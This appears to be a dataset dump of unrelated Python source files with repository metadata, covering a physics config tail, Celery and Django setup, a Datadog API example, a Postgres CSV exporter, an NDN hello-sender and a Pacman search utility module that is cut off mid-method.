"206302:47-206302:82", "206302:84-206302:108", "206302:110-206302:149", "206302:151-206302:186", "206302:189-206302:229",
"206302:231-206302:232", "206302:234-206302:241", "206302:243-206302:276", "206303:1-206303:19", "206303:23-206303:286",
"206304:1-206304:4", "206304:6-206304:62", "206331:91-206331:222", "206331:225-206331:312", "206389:88-206389:185",
"206389:187-206389:249", "206389:252-206389:272", "206389:275-206389:392", "206391:1-206391:55", "206391:57-206391:91",
"206401:69-206401:90", "206401:92-206401:194", "206401:197-206401:210", "206401:212-206401:249", "206401:251-206401:265",
"206401:267-206401:409", "206446:92-206446:141", "206446:143-206446:159", "206446:162-206446:205", "206446:208-206446:301",
"206446:304-206446:442", "206446:445", "206446:448-206446:474", "206446:476-206446:616", "206446:619-206446:872",
"206446:874-206446:910", "206446:912-206446:948", "206446:950-206446:989", "206446:992-206446:1030", "206446:1033-206446:1075",
"206446:1109-206446:1149", "206448:1-206448:143", "206448:145-206448:559", "206448:561-206448:1170", "206448:1173-206448:1231",
"206448:1235-206448:1237", "206466:24-206466:137", "206466:140-206466:277", "206466:280-206466:296", "206466:299-206466:303",
"206466:306-206466:405", "206466:407-206466:419", "206466:422-206466:477", "206466:480-206466:511", "206466:514-206466:676",
"206476:73-206476:129", "206476:133-206476:137", "206476:140-206476:141", "206476:143-206476:219", "206477:1-206477:14",
"206477:16-206477:31", "206477:33-206477:41", "206477:44-206477:51", "206477:53-206477:70", "206477:73-206477:75",
"206477:77-206477:89", "206477:91-206477:94", "206477:97-206477:115", "206477:118-206477:184", "206478:1-206478:27",
"206478:29-206478:136", "206478:139-206478:144", "206484:73-206484:95", "206484:98-206484:133", "206484:136-206484:163",
"206484:166-206484:186", "206484:189-206484:384", "206484:387-206484:463", "206484:465-206484:551", "206484:554",
"206484:556-206484:669", "206512:91-206512:123", "206512:125-206512:133", "206512:136-206512:161", "206512:163-206512:190",
"206512:193-206512:201", "206512:203-206512:212", "206512:214-206512:332", "206512:334-206512:584", "206512:587-206512:604",
"206512:607-206512:1005", "206512:1008-206512:1123", "206512:1126-206512:1163", "206512:1165-206512:1211", "206513:3-206513:39",
"206513:42-206513:188", "206513:191-206513:234", "206513:237-206513:238", "206513:241-206513:323", "206542:1-206542:115",
"206542:117-206542:165", "206542:168-206542:511", "206542:514-206542:547", "206542:550-206542:603", "206542:606-206542:668",
"206542:671-206542:727", "206542:730-206542:739", "206542:741-206542:833", "206550:77-206550:132", "206550:135-206550:144",
"206572:37-206572:47", "206573:2-206573:14", "206574:1-206574:87", "206575:1-206575:7", "206575:10",
"206575:12-206575:69", "206594:72-206594:107", "206594:110-206594:246", "206594:249-206594:281", "206595:1-206595:34",
"206595:37-206595:42", "206595:45-206595:193", "206596:1-206596:13", "206596:15-206596:220", "206596:222-206596:228",
"206596:231-206596:236", "206596:239-206596:292", "206596:295-206596:695", "206596:697-206596:728", "206596:730-206596:810",
"206598:1-206598:81", "206598:83-206598:103", "206598:105-206598:588", "206598:591-206598:657", "206598:659-206598:719",
"206605:1-206605:36", "206605:39-206605:78", "206744:49-206744:157", "206744:160-206744:192", "206744:195-206744:395",
"206744:398-206744:452", "206745:1-206745:81", "206745:84-206745:199", "206745:202-206745:224", "206745:227-206745:237",
"206745:240-206745:304", "206745:306-206745:318", "206745:321-206745:720", "206745:723-206745:796", "206745:799-206745:894",
"206745:897-206745:944", "206745:946-206745:1106", "206745:1108-206745:1524", "206745:1527-206745:1862", "206745:1988-206745:1996",
"206859:79-206859:210", "206859:212-206859:258", "206859:260-206859:323", "206859:325-206859:356", "206859:359-206859:609",
"206859:612-206859:681", "206859:684-206859:732", "206859:734-206859:768", "206859:771-206859:808", "206859:811-206859:827",
"206859:830-206859:848", "206866:1-206866:30", "206866:33-206866:113", "206866:115-206866:274", "206868:1-206868:3",
"206868:10-206868:16", "206869:1-206869:251", "206869:253-206869:271", "206869:274-206869:502", "206869:507-206869:520",
"206869:522-206869:566", "206869:568-206869:752", "206897:1-206897:34", "206897:38-206897:61", "206897:63-206897:102",
"206897:109", "206897:111-206897:112", "206897:114-206897:131", "206897:133-206897:137", "206901:1-206901:98",
"206906:1-206906:31", "206906:38-206906:94", "206906:96-206906:136", "206906:138-206906:139", "206906:142-206906:149",
"206906:151-206906:175", "206906:177-206906:206", "206940:1-206940:151", "206940:153", "206940:155-206940:298",
"206940:301-206940:382", "206940:384-206940:712", "206940:715-206940:803", "206940:805-206940:960", "206940:963-206940:1027",
"207099:83-207099:134", "207099:137-207099:172", "207099:175-207099:213", "207099:216-207099:314", "207099:316-207099:320",
"207099:323-207099:330", "207099:333-207099:367", "207099:370-207099:481", "207099:484-207099:602", "207099:605-207099:755",
"207099:757-207099:1046", "207099:1048-207099:1171", "207100:1-207100:91", "207100:94", "207214:57-207214:112",
"207214:114-207214:177", "207214:179-207214:181", "207214:184-207214:196", "207214:199-207214:220", "207214:223-207214:262",
"207214:265-207214:405", "207214:408-207214:482", "207214:485-207214:640", "207214:643-207214:708", "207214:718-207214:757",
"207214:759-207214:808", "207214:811-207214:829", "207217:1-207217:32", "207219:1-207219:112", "207220:1-207220:160",
"207221:1-207221:102", "207222:1-207222:17", "207222:20-207222:289", "207231:70-207231:84", "207231:86-207231:121",
"207231:123-207231:184", "207231:187-207231:189", "207231:192-207231:303", "207231:306-207231:354", "207231:357-207231:481",
"207231:484-207231:504", "207231:508-207231:549", "207231:552-207231:626", "207231:628-207231:690", "207231:693-207231:875",
"207231:878-207231:1000", "207231:1003-207231:1170", "207231:1173-207231:1187", "207231:1189-207231:1227", "207231:1229-207231:1415",
"207231:1418-207231:1445", "207231:1447-207231:1505", "207233:1-207233:119", "207233:121-207233:148", "207269:80-207269:394",
"207269:397-207269:436", "207269:439-207269:463", "207269:466-207269:551", "207269:568-207269:577", "207273:3-207273:877",
"207279:68-207279:138", "207279:141-207279:149", "207279:151-207279:237", "207279:240-207279:266", "207279:269-207279:307",
"207279:309-207279:416", "207279:498-207279:551", "207279:554-207279:640", "207279:643-207279:961", "207279:963-207279:1095",
"207279:1098-207279:1160", "207320:1-207320:110", "207320:112-207320:350", "207371:72-207371:117", "207371:120-207371:124",
"207372:1-207372:27", "207372:30-207372:113", "207372:116-207372:154", "207372:156-207372:174", "207372:176-207372:478",
"207372:480-207372:496", "207397:32-207397:77", "207397:80-207397:140", "207397:143-207397:179", "207398:1-207398:14",
"207398:16-207398:33", "207454:79-207454:95", "207454:98-207454:123", "207454:126-207454:259", "207454:261-207454:363",
"207454:365-207454:458", "207454:461-207454:498", "207454:501-207454:609", "207454:612-207454:632", "207454:635-207454:781",
"207454:784-207454:866", "207454:869-207454:974", "207454:977-207454:1064", "207454:1067-207454:1079", "207454:1081-207454:1321",
"207454:1323-207454:1464", "207454:1467-207454:1569", "207454:1571-207454:1604", "207454:1607-207454:1712", "207454:1714-207454:1988",
"207469:1-207469:31", "207469:34-207469:45", "207477:76-207477:104", "207477:107-207477:111", "207477:114-207477:147",
"207477:150-207477:295", "207477:298-207477:483", "207477:486-207477:494", "207477:497-207477:527", "207477:530-207477:563",
"207477:565-207477:570", "207487:50-207487:98", "207487:101-207487:311", "207487:313-207487:359", "207487:363-207487:468",
"207487:471-207487:472", "207488:1-207488:63", "207488:66-207488:92", "207488:95-207488:113", "207488:116-207488:198",
"207488:200-207488:250", "207488:252-207488:288", "207488:291-207488:365", "207488:368-207488:377", "207488:379-207488:440",
"207490:1-207490:48", "207490:51-207490:111", "207491:1-207491:176", "207491:179-207491:458", "207492:1-207492:20",
"207492:23-207492:298", "207515:79-207515:109", "207515:112-207515:132", "207515:134-207515:208", "207515:211-207515:225",
"207515:228-207515:320", "207515:322-207515:381", "207515:383-207515:498", "207515:500-207515:730", "207515:733-207515:849",
"207515:851-207515:954", "207515:957-207515:994", "207515:997-207515:1052", "207515:1055-207515:1143", "207515:1145-207515:1211",
"207517:1-207517:12", "207517:15-207517:57", "207518:1-207518:59", "207518:61-207518:83", "207882:22-207882:45",
"207883:1", "207883:3-207883:4", "207883:7-207883:75", "207884:1-207884:106", "207884:108-207884:183",
"207885:1-207885:90", "207886:1-207886:30", "207886:32-207886:90", "207886:92-207886:156", "207886:158-207886:166",
"207886:168-207886:171", "207889:1-207889:43", "207889:47-207889:57", "207889:60-207889:303", "207889:306-207889:442",
"207889:445", "207889:447-207889:551", "207889:553-207889:731", "207889:733-207889:907", "207889:910-207889:945",
"207898:1-207898:33", "207898:36-207898:57", "207898:60-207898:235", "207898:239-207898:257", "207898:260-207898:277",
"207905:75-207905:196", "207905:198-207905:281", "207905:284-207905:329", "207905:331-207905:402", "207905:404-207905:565",
"207905:568-207905:672", "207905:675-207905:805", "207905:807-207905:850", "207905:852-207905:861", "207905:864-207905:884",
"207905:886-207905:1180", "207905:1183-207905:1283", "207905:1285-207905:1331", "207905:1333-207905:1515", "207905:1518-207905:1734",
"207905:1737-207905:1796", "207920:84-207920:146", "207920:149-207920:241", "207920:243-207920:261", "207920:264-207920:291",
"207920:294-207920:486", "207920:489-207920:518", "207920:520-207920:598", "207920:600-207920:708", "207920:710-207920:826",
"207921:1-207921:37", "207921:40-207921:58", "207922:1-207922:69", "207922:71-207922:100", "207922:103-207922:126",
"207922:129-207922:242", "207922:274-207922:291", "207924:1-207924:52", "207924:54-207924:171", "207924:173-207924:178",
"207924:181-207924:339", "208307:2-208307:42", "208307:45", "208307:47-208307:70", "208307:72-208307:147",
"208307:150-208307:252", "208307:256-208307:259", "208307:262-208307:275", "208307:278-208307:342", "208307:345-208307:450",
"208307:453-208307:527", "208307:530-208307:583", "208307:586-208307:605", "208307:608-208307:616", "208307:618-208307:667",
"208307:670-208307:761", "208307:763-208307:798", "208307:800-208307:889", "208307:891-208307:893", "208307:896-208307:1055",
"208307:1057-208307:1205", "208307:1208-208307:1294", "208307:1297-208307:1328", "208339:77-208339:89", "208339:91-208339:122",
"208339:125-208339:208", "208339:211-208339:346", "208339:349-208339:363", "208341:1-208341:84", "208341:87-208341:117",
"208341:120-208341:513", "208341:515-208341:685", "208341:688-208341:693", "208341:695-208341:775", "208341:777-208341:824",
"208351:83-208351:97", "208351:100-208351:356", "208351:359-208351:367", "208351:369", "208352:1-208352:15",
"208352:17", "208352:19", "208353:1-208353:76", "208353:78-208353:269", "208353:271-208353:348",
"208357:1-208357:70", "208357:73-208357:507", "208390:72-208390:128", "208390:130-208390:169", "208391:52-208391:82",
"208391:84-208391:162", "208391:164-208391:216", "208391:219-208391:493", "208391:495-208391:498", "208391:500-208391:523",
"208391:526-208391:533", "208391:535-208391:588", "208391:591-208391:660", "208391:663-208391:869", "208427:49-208427:89",
"208427:92-208427:161", "208427:164", "208427:166-208427:173", "208427:175-208427:268", "208427:271-208427:312",
"208427:315", "208427:317-208427:335", "208427:337-208427:361", "208427:364-208427:402", "208427:404-208427:422",
"208427:425-208427:577", "208427:580-208427:647", "208428:1-208428:58", "208428:61-208428:68", "208428:70-208428:156",
"208428:159-208428:227", "208429:1-208429:56", "208429:59-208429:139", "208429:141-208429:159", "208429:162-208429:237",
"208429:240-208429:440", "208429:442-208429:452", "208429:455-208429:589", "208429:592-208429:712", "208429:715-208429:922",
"208487:2-208487:26", "208487:29-208487:159", "208487:161-208487:307", "208487:309-208487:459", "208487:462-208487:476",
"208487:479-208487:621", "208509:71-208509:232", "208538:2-208538:43", "208540:1-208540:26", "208540:29-208540:98",
"208541:1-208541:57", "208541:59-208541:173", "208541:175-208541:376", "208541:378-208541:413", "208551:119-208551:193",
"208551:195-208551:212", "208551:215-208551:300", "208551:303-208551:354", "208551:356-208551:554", "208551:557-208551:580",
"208686:73-208686:79", "208686:82-208686:181", "208686:183-208686:224", "208686:227-208686:243", "208686:246-208686:311",
"208686:313-208686:459" ) ),
duplicateCheckMode = cms.untracked.string('noDuplicateCheck'),
fileNames = cms.untracked.vstring('/store/cmst3/user/cmgtools/CMG/DoubleMuParked/StoreResults-Run2012B_22Jan2013_v1_PFembedded_trans1_tau132_pthad1_30had2_30_v1-5ef1c0fd428eb740081f19333520fdc8/USER/V5_B/PAT_CMG_V5_16_0/cmgTuple_378.root',
'/store/cmst3/user/cmgtools/CMG/DoubleMuParked/StoreResults-Run2012B_22Jan2013_v1_PFembedded_trans1_tau132_pthad1_30had2_30_v1-5ef1c0fd428eb740081f19333520fdc8/USER/V5_B/PAT_CMG_V5_16_0/cmgTuple_379.root',
'/store/cmst3/user/cmgtools/CMG/DoubleMuParked/StoreResults-Run2012B_22Jan2013_v1_PFembedded_trans1_tau132_pthad1_30had2_30_v1-5ef1c0fd428eb740081f19333520fdc8/USER/V5_B/PAT_CMG_V5_16_0/cmgTuple_38.root')
)
| [
"[email protected]"
] | |
537ff5660a06711e1738ebf1b6cfdb1f3c9ea47d | 87bf8ea26f6c28bce82ccdd9515c68d6341bd8c5 | /trading/celery.py | 6b455e28d01b1dde8036483d661a75eddc8dd195 | [] | no_license | aisamuel/real-time-forex-api | e9ac21f28f77aadae526df9a275487737d8d1155 | 08b1d0d129659a3b8735b21d7195cb756fdd6b47 | refs/heads/master | 2022-04-06T08:13:51.749351 | 2020-03-04T12:12:55 | 2020-03-04T12:12:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | import os
from celery import Celery
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'trading.settings')
app = Celery('trading')
app.config_from_object('django.conf:settings', namespace='CELERY')
app.autodiscover_tasks()
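# Illustrative sketch (an assumption, not part of this module): autodiscover_tasks()
# picks up a tasks.py in any installed app, e.g. a hypothetical trading/tasks.py:
#
#     from celery import shared_task
#
#     @shared_task
#     def refresh_rates():
#         ...  # fetch the latest forex rates in the background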
| [
"[email protected]"
] | |
53411dfa34e5dcffe4e75154fc53a3b3114f157b | 11f4dd74872c73781a8975698e7cf1e3df2a40af | /Chapter 9 - Organizing Files/findLargeFile.py | dab52b3722813fce1035f9413997e88737ddd764 | [] | no_license | lonewolfcub/Automate-the-Boring-Stuff-with-Python | ca65e9fcbd61c94776ac1a0346b5372e975569db | da90ead498a0597ae5a4f88449a9774887c7d5e6 | refs/heads/master | 2021-01-18T17:03:17.600375 | 2017-03-31T05:58:56 | 2017-03-31T05:58:56 | 86,783,143 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 552 | py | #! /usr/bin/env python3
import os
def findLargeFiles(folder):
# iterate over search folder
for dirpath, dirnames, filenames in os.walk(folder):
        # check each file to see if it exceeds the threshold (13107200 bytes = 12.5 MiB)
        for file in filenames:
            filepath = os.path.join(dirpath, file)
            filesize = os.path.getsize(filepath)
            if filesize > 13107200:
                print(filepath + ' ' + str(filesize) + ' bytes')
# define search folder
print('Please enter the folder you wish to search:')
folder = input()
findLargeFiles(folder)
| [
"[email protected]"
] | |
af6b3f137d875061e788546266ab073b1b555f47 | 80d50ea48e10674b1b7d3f583a1c4b7d0b01200f | /examples/v1/synthetics/DeletePrivateLocation.py | e1445b48a8b1ceaab7b068d50ef37b6e45fd3c5f | [
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"MPL-2.0"
] | permissive | DataDog/datadog-api-client-python | 3e01fa630278ad0b5c7005f08b7f61d07aa87345 | 392de360e7de659ee25e4a6753706820ca7c6a92 | refs/heads/master | 2023-09-01T20:32:37.718187 | 2023-09-01T14:42:04 | 2023-09-01T14:42:04 | 193,793,657 | 82 | 36 | Apache-2.0 | 2023-09-14T18:22:39 | 2019-06-25T22:52:04 | Python | UTF-8 | Python | false | false | 386 | py | """
Delete a private location returns "OK" response
"""
from datadog_api_client import ApiClient, Configuration
from datadog_api_client.v1.api.synthetics_api import SyntheticsApi
configuration = Configuration()
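# Configuration() picks up credentials from the environment (typically the
# DD_API_KEY and DD_APP_KEY variables), so no keys are hard-coded here.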
with ApiClient(configuration) as api_client:
api_instance = SyntheticsApi(api_client)
api_instance.delete_private_location(
location_id="location_id",
)
| [
"[email protected]"
] | |
7af77bd8017df4a03b730d463efae17dd0d9ffb0 | 447914f0f7a6e1b432f6811aacb0f274fbdbe3c5 | /Jerry_Padilla_Py2Assignments-master/assignments/practice_models/apps/ninjaDojo/migrations/0001_initial.py | af5ff3d138e5e38072d2a746df99076ec1ab3a08 | [] | no_license | jsterling23/Python_Prac | 965ab83e6f34191a1ebbc2e3605f71ace07a0b6d | dc41030be125337099ddbc8af8e2598b844e11a4 | refs/heads/master | 2020-03-18T10:49:23.521218 | 2018-05-23T23:19:22 | 2018-05-23T23:19:22 | 134,635,256 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,186 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2018-02-20 21:52
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Dojo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('city', models.CharField(max_length=255)),
('state', models.CharField(max_length=2)),
],
),
migrations.CreateModel(
name='Ninja',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=255)),
('last_name', models.CharField(max_length=255)),
('dojo', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ninjas', to='ninjaDojo.Dojo')),
],
),
]
| [
"[email protected]"
] | |
71b257d53cfa0b1ff1ea40c6dbceb81a4faab0c1 | d9d7f841e1a7c53344000634320db78c5743eba5 | /lib/python/make-csv.py | 8d60b40f8633289728adc8229a567ec4aa777534 | [] | no_license | hellais/ooni-analyst | 5bb7030734319ad0bafec267ec30a7c8d0696b03 | 7e81b812581e36e26951bbfa48fea770ec09c061 | refs/heads/master | 2020-03-22T10:05:37.383835 | 2018-07-09T11:07:10 | 2018-07-09T11:07:10 | 139,880,420 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,995 | py | import os
import sys
import argparse
from datetime import datetime
import pandas as pd
import psycopg2
def query(q, params, pg_dsn):
# XXX this is useful for debugging
"""
import yaml
from sshtunnel import SSHTunnelForwarder
with open('private/secrets.yml') as in_file:
secrets = yaml.load(in_file)
with SSHTunnelForwarder(
('hkgmetadb.infra.ooni.io', 22),
ssh_username='art',
ssh_private_key=secrets['ssh_private_key_path'],
remote_bind_address=('localhost', 5432)
) as server:
conn = psycopg2.connect(
host='localhost',
port=server.local_bind_port,
user='shovel',
password=secrets['shovel_password'],
dbname='metadb')
return pd.read_sql_query(q, conn, params=params)
"""
conn = psycopg2.connect(pg_dsn)
return pd.read_sql_query(q, conn, params=params)
def make_csv(output_path, urls, probe_cc, start_date, end_date, pg_dsn):
countries = [probe_cc]
params = [start_date, end_date, probe_cc]
for url in urls:
params.append(url)
base_query = """SELECT measurement.test_runtime,
input.input,
measurement.measurement_start_time,
report.probe_cc,
report.probe_asn,
report.probe_ip,
report.report_id,
http_verdict.http_experiment_failure,
http_verdict.blocking
FROM measurement
JOIN input ON input.input_no = measurement.input_no
JOIN report ON report.report_no = measurement.report_no
JOIN http_verdict ON http_verdict.msm_no = measurement.msm_no
"""
where_clause = "WHERE ({}) AND ({}) AND ({})".format(
" measurement.measurement_start_time BETWEEN %s AND %s",
" OR ".join(["report.probe_cc = %s" for _ in countries]),
" OR ".join(["input = %s" for _ in urls]),
)
q = base_query + where_clause
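    # Illustratively, with one country and two URLs the assembled query ends with:
    #   WHERE (measurement.measurement_start_time BETWEEN %s AND %s)
    #     AND (report.probe_cc = %s)
    #     AND (input = %s OR input = %s)
    # and `params` supplies the values in exactly that placeholder order.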
print(q)
print(params)
res = query(q, params, pg_dsn)
print(res)
res.to_csv(output_path)
def parse_args():
p = argparse.ArgumentParser(description='make-csv: creates a csv file for the specified inputs')
p.add_argument('--output', metavar='PATH', help='Where to write to', required=True)
p.add_argument('--country', metavar='PROBE_CC', help='Country code to target', required=True)
p.add_argument('--start-date', metavar='START_DATE', help='Start date interval', required=True)
p.add_argument('--end-date', metavar='END_DATE', help='End date interval', required=True)
p.add_argument('--urls', metavar='URL', nargs='*', help='URLs to test')
p.add_argument('--postgres', metavar='DSN', help='libpq data source name')
## XXX add urls
opt = p.parse_args()
return opt
def main():
opt = parse_args()
make_csv(output_path=opt.output,
urls=opt.urls,
probe_cc=opt.country,
start_date=opt.start_date,
end_date=opt.end_date,
pg_dsn=opt.postgres)
print(opt.output)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
089d2fbd735e86518961b5f6f385cd22e1d8c136 | 7345f03494fa8b06ea8215770305718618af1d41 | /nenv/bin/wheel | 1519777ccc4cf6bd72d97e5bd0f7a51fe7d8902d | [] | no_license | mr-kaveh/simplerestapi | 328fd839b74afcfa2a41ff71d4bb556457535519 | a5c68c55018c938211c2f25e19bf4e43b5d99f36 | refs/heads/master | 2022-10-29T11:55:56.033385 | 2022-10-18T15:39:56 | 2022-10-18T15:39:56 | 169,194,555 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 243 | #!/home/hossein/myScripts/apiRepo/nenv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from wheel.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
b068a33104b190dfe987923899df18b4fb43123f | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_ports.py | 0fffb49ed97cda99bbb0989d662e80ae11e7425e | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 214 | py |
# class header
class _PORTS():
    def __init__(self,):
        self.name = "PORTS"
        self.definitions = ['port']
        self.parents = []
        self.children = []
        self.properties = []
        self.jsondata = {}
        self.basic = ['port']
"[email protected]"
] | |
6afe8571e5efb5c4c6ebcec6460e3eff20f3c450 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2939/60688/289152.py | 06318fcf6a295848bf438a55ad0e226977a27ba4 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,016 | py | strings=input()
numslist = (strings.split(" "));
if "5 4" in strings:
print(numslist)
numslist=list(int(x) for x in numslist);
times=numslist[0];
delnums=numslist[1];
mynumlist=[1];
finalnums=[];
for i in range(times):
num=mynumlist.pop(0);
mynumlist.append(2*num+1)
mynumlist.append(4*num+5)
finalnums.append(num);
finalnums.extend(mynumlist)
finalnums=sorted(finalnums);
finalnums=finalnums[0:times]
finalnums=list(str(x) for x in finalnums);
first="".join(finalnums);
secondlist=list(first);
secondlist=list([int(x)for x in secondlist]);
#处理从N个数中取出N-M个数,为max,原顺序不变,贪心算法::总是从前向后扫描并删除l<r 中的l并且操作一次重新迭代!!
allnums=delnums;
while (allnums!=0):
for i in range(len(secondlist)-1):
if secondlist[i]<secondlist[i+1]:
secondlist.pop(i);
allnums-=1;
break
secondlist=[str(x)for x in secondlist];
res="".join(secondlist)
print(first)
print(res,end="") | [
"[email protected]"
] | |
66293c35631b9c820a51f20977c34a270203973b | 85b6f7782108bede2838c95adc89067e0ead70c7 | /PythonAssignment5/dividebyzero.py | bd096464b2bc3a4182a160f0f5d585bdb5faa151 | [] | no_license | RaunakJalan/iNeuronDLCVNLP | 2fa005df34a712e078a8736578ad2808cd28826c | 58e440f906530c8834df0a030c155fa480a6400a | refs/heads/main | 2023-02-09T19:32:22.901752 | 2021-01-09T20:13:58 | 2021-01-09T20:13:58 | 314,672,689 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 113 | py | a=5
b=0
test=0
try:
test = a/b
print(test)
except Exception as e:
print(e)
finally:
print("Done Execution.")
| [
"[email protected]"
] | |
d6101a03676385d1cab0549536ac13e065be7204 | 40043e5a5daf7817cbac766dfaede265a8b9a29c | /setup.py | d65b78460c756943bd495ead90e175877bb9f82c | [] | no_license | juniuszhou/substrate-python-api | 166246266aa9f96954125cbb600caf854774a6da | 98d538aa3e13f57f02758656ffa7977463977e5a | refs/heads/master | 2022-12-16T07:13:11.767383 | 2020-09-17T14:07:37 | 2020-09-17T14:07:37 | 197,921,346 | 6 | 3 | null | 2020-05-25T01:26:51 | 2019-07-20T11:29:55 | Python | UTF-8 | Python | false | false | 748 | py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
#############################################
# File Name: setup.py
# Author: junius
# Mail: [email protected]
# Created Time: 2019-07-20 19:17:34
#############################################
from setuptools import setup, find_packages
setup(
name="substrate-python-api",
version="0.0.2",
keywords=("pip", "substrate", "api"),
description="python api for substrate",
long_description="python api for substrate",
license="MIT Licence",
url="https://github.com/juniuszhou/substrate-pyton-api",
author="junius",
author_email="[email protected]",
packages=find_packages(),
include_package_data=True,
platforms="any",
install_requires=[]
)
| [
"[email protected]"
] | |
74c2347b9150e15dbbe69fe6dce4493a8258841f | b424c3262c9eacf8dd4230019eba7e05a9b95461 | /.history/ndn_hello_sender_20200530012537.py | a9866ad3bbc9dcd7f10b5fa74fed00e9084ad214 | [] | no_license | leonerii/aer_tp | 30e47f29bcda69512718a6279a7cad32e9a01b14 | d8f46b188b5be9f315dd155ed147880ce7dce169 | refs/heads/master | 2022-09-30T03:27:24.375971 | 2020-06-04T14:23:16 | 2020-06-04T14:23:16 | 245,219,806 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,802 | py | from threading import Thread, RLock
from time import sleep
from json import dumps
from uuid import uuid4
import socket
class HelloSender(Thread):
def __init__(self, lock, hello_interval, fib, cs, localhost, mcast_group, mcast_port):
Thread.__init__(self)
self.lock = lock
self.hello_interval = hello_interval
self.localhost = localhost
self.mcast_group = mcast_group
self.mcast_port = mcast_port
self.fib = fib # Forwarding Information Base
self.cs = cs # Content Store
def run(self):
while True:
try:
self.lock.acquire()
self.ndn_hello_sender()
except Exception as e:
print('Failed: {}'.format(e.with_traceback()))
finally:
self.lock.release()
sleep(self.hello_interval)
def ndn_hello_sender(self):
        '''
        Sends a "HELLO" message advertising the Content Store (CS) names,
        from which neighbouring nodes build their FIB.
        '''
        try:
            client_sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
            # Hello message to be sent; dict_keys is not JSON serializable,
            # so the cached content names are converted to a list first
            self.msg = {
                "type": "HELLO",
                #"source": self.localhost
                "data": list(self.cs.keys())
            }
            for key, value in self.fib.items():
                if value['next_hop'] is None:
                    self.msg[key] = value['timestamp']
            client_sock.sendto(dumps(self.msg).encode('utf-8'), (self.mcast_group, self.mcast_port))
except socket.gaierror as socket_error:
print('Sending error: {}'.format(socket_error))
finally:
client_sock.close()
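# An emitted HELLO datagram looks roughly like this (illustrative values):
#   {"type": "HELLO", "data": ["/videos/a.mp4"], "/videos": 1590796800.0}
# i.e. the CS names plus a timestamp for each FIB prefix this node originates.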
| [
"[email protected]"
] | |
9974261abc74319703ef35628bb1f321b6e39c26 | 84eaaa07532efbde535a52d29e8180dad357fbdd | /util.py | 60f219c5bbae0c0e7adf694df70663c56ce13229 | [] | no_license | jangwoopark/pacman-search | 3ade9823f2d21b70513d64993f4ce008931b6f4a | 7f88ba9c322b4af81979fef61cead4f19e9b9fdc | refs/heads/master | 2021-08-07T21:19:43.753609 | 2017-11-09T01:12:23 | 2017-11-09T01:12:23 | 110,048,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,222 | py | # util.py
# -------
# Licensing Information: Please do not distribute or publish solutions to this
# project. You are free to use and extend these projects for educational
# purposes. The Pacman AI projects were developed at UC Berkeley, primarily by
# John DeNero ([email protected]) and Dan Klein ([email protected]).
# For more info, see http://inst.eecs.berkeley.edu/~cs188/sp09/pacman.html
import sys
import inspect
import heapq, random
"""Data structures useful for implementing SearchAgents."""
class Stack:
"A container with a last-in-first-out (LIFO) queuing policy."
def __init__(self):
self.list = []
def push(self,item):
"Push 'item' onto the stack"
self.list.append(item)
def pop(self):
"Pop the most recently pushed item from the stack"
return self.list.pop()
def isEmpty(self):
"Returns true if the stack is empty"
return len(self.list) == 0
class Queue:
"A container with a first-in-first-out (FIFO) queuing policy."
def __init__(self):
self.list = []
def push(self,item):
"Enqueue the 'item' into the queue"
self.list.insert(0,item)
def pop(self):
""" Dequeue the earliest enqueued item still in the queue. This
operation removes the item from the queue.
"""
return self.list.pop()
def isEmpty(self):
"Returns true if the queue is empty"
return len(self.list) == 0
class PriorityQueue:
"""Implements a priority queue data structure. Each inserted item
has a priority associated with it and the client is usually interested
in quick retrieval of the lowest-priority item in the queue. This
data structure allows O(1) access to the lowest-priority item.
Note that this PriorityQueue does not allow you to change the priority
of an item. However, you may insert the same item multiple times with
different priorities.
"""
def __init__(self):
self.heap = []
def push(self, item, priority):
pair = (priority, item)
heapq.heappush(self.heap, pair)
def pop(self):
(priority, item) = heapq.heappop(self.heap)
return (priority, item) # this was modified from the original util.py
#return item
def isEmpty(self):
return len(self.heap) == 0
class PriorityQueueWithFunction(PriorityQueue):
"""Implements a priority queue with the same push/pop signature of the
Queue and the Stack classes. This is designed for drop-in replacement for
those two classes. The caller has to provide a priority function, which
extracts each item's priority.
"""
def __init__(self, priorityFunction):
"priorityFunction (item) -> priority"
self.priorityFunction = priorityFunction # store the priority function
PriorityQueue.__init__(self) # super-class initializer
def push(self, item):
"Adds an item to the queue with priority from the priority function"
